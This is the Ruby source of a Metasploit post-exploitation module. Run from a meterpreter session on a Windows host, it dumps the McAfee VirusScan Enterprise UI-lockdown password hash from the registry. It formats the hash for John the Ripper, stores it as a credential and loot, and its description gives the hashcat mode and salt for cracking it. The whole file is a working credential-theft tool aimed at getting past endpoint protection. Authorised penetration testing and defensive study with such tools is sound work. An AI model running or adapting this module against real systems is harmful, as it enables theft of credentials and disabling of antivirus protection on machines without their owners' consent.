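##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that reads the McAfee VSE user-interface lockdown password hash
# ('UIPEx') and product version ('szProductVer') from the registry, reports the
# hash as a non-replayable credential and writes it to a loot file.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  # Version boundaries used to choose the hash format: [5.0, 6.0) is handled as
  # v5, [8.0, 9.0) as v8; anything else is treated as v8 with a warning.
  VERSION_5 = Rex::Version.new('5.0')
  VERSION_6 = Rex::Version.new('6.0')
  VERSION_8 = Rex::Version.new('8.0')
  VERSION_9 = Rex::Version.new('9.0')

  # Registry keys that hold the VSE configuration.
  VSE_KEYS = [
    'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection', # 64-bit
    'HKLM\\Software\\McAfee\\DesktopProtection' # 32-bit
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'McAfee Virus Scan Enterprise Password Hashes Dump',
        'Description' => %q{
          This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)
          used to lock down the user interface. Hashcat supports cracking this type of
          hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt
          (--hex-salt) of 01000f000d003300 (unicode "\x01\x0f\x0d\x33"). A dynamic
          format is available for John the Ripper at the referenced URL.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Mike Manzotti <mike.manzotti[at]dionach.com>', # Metasploit module
          'Maurizio inode Agazzini' # original research
        ],
        'References' => [
          ['URL', 'https://www.dionach.com/blog/disabling-mcafee-on-access-scanning']
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter']
      )
    )
  end

  # Entry point: enumerate installations, read the hash/version pair from each,
  # then report them. Returns early with a verbose error when nothing is found.
  def run
    print_status("Looking for McAfee VSE password hashes on #{sysinfo['Computer']} ...")

    vse_keys = enum_vse_keys
    if vse_keys.empty?
      vprint_error('McAfee VSE not installed or insufficient permissions')
      return
    end

    hashes_and_versions = extract_hashes_and_versions(vse_keys)
    if hashes_and_versions.empty?
      vprint_error('No McAfee VSE hashes extracted')
      return
    end

    process_hashes_and_versions(hashes_and_versions)
  end

  # Returns the subset of VSE_KEYS that can be enumerated on the target. A nil
  # result from registry_enumkeys (key absent, or not readable by the session)
  # drops that key.
  #
  # @return [Array<String>] registry key paths that could be enumerated
  def enum_vse_keys
    vprint_status('Enumerating McAfee VSE installations')
    VSE_KEYS.reject { |key| registry_enumkeys(key).nil? }
  end

  # Reads the stored UI password hash ('UIPEx') and product version
  # ('szProductVer') from each key.
  #
  # @param keys [Array<String>] registry keys returned by enum_vse_keys
  # @return [Hash{String => Rex::Version}] raw hash value => product version;
  #   keyed by hash, so identical values from several keys collapse to one entry
  def extract_hashes_and_versions(keys)
    vprint_status("Attempting to extract hashes from #{keys.size} McAfee VSE installations")
    keys.each_with_object({}) do |key, hash_map|
      # registry_getvaldata can return nil for a missing value, so test nil as
      # well as empty; calling empty? on nil would abort the whole run.
      hash = registry_getvaldata(key, 'UIPEx')
      if hash.nil? || hash.empty?
        vprint_error("No McAfee VSE password hash found in #{key}")
        next
      end

      version = registry_getvaldata(key, 'szProductVer')
      if version.nil? || version.empty?
        vprint_error("No McAfee VSE version key found in #{key}")
        next
      end

      begin
        hash_map[hash] = Rex::Version.new(version)
      rescue ArgumentError => e
        # A malformed version string in one key should not abort the others.
        vprint_error("Unparseable McAfee VSE version '#{version}' in #{key}: #{e.message}")
      end
    end
  end

  # Reports each hash: prints it, records it as a non-replayable credential
  # tagged with the matching JtR format, and stores it as loot.
  #
  # @param hashes_and_versions [Hash{String => Rex::Version}] as returned by
  #   extract_hashes_and_versions
  def process_hashes_and_versions(hashes_and_versions)
    hashes_and_versions.each do |raw_hash, version|
      hash, hashtype, version_name = format_vse_hash(raw_hash, version)

      print_good("McAfee VSE #{version_name} (#{hashtype}) password hash: #{hash}")

      credential_data = {
        post_reference_name: refname,
        origin_type: :session,
        private_type: :nonreplayable_hash,
        private_data: hash,
        session_id: session_db_id,
        jtr_format: hashtype,
        workspace_id: myworkspace_id
      }

      create_credential(credential_data)

      # Store McAfee password hash as loot
      loot_path = store_loot('mcafee.hash', 'text/plain', session, "mcafee:#{hash}", 'mcafee_hashdump.txt', 'McAfee Password Hash')
      print_good("McAfee VSE password hash saved in: #{loot_path}")
    end
  end

  # Maps a raw registry value to the form recorded in the credential store.
  #
  # v5.x stores the hash as-is and is tagged 'md5u'. Every other version is
  # treated as the v8 layout: the value is base64 and is re-encoded as hex for
  # the 'dynamic_1405' format. Versions outside 8.x still take the v8 path, but
  # a warning is printed so the operator knows the format was assumed.
  #
  # @param hash [String] raw 'UIPEx' value
  # @param version [Rex::Version] product version
  # @return [Array(String, String, String)] [hash, jtr_format, version label]
  def format_vse_hash(hash, version)
    return [hash, 'md5u', 'v5'] if version >= VERSION_5 && version < VERSION_6

    unless version >= VERSION_8 && version < VERSION_9
      print_warning("Unknown McAfee VSE version #{version} - Assuming v8")
    end
    [Rex::Text.to_hex(Rex::Text.decode_base64(hash), ''), 'dynamic_1405', 'v8']
  end
end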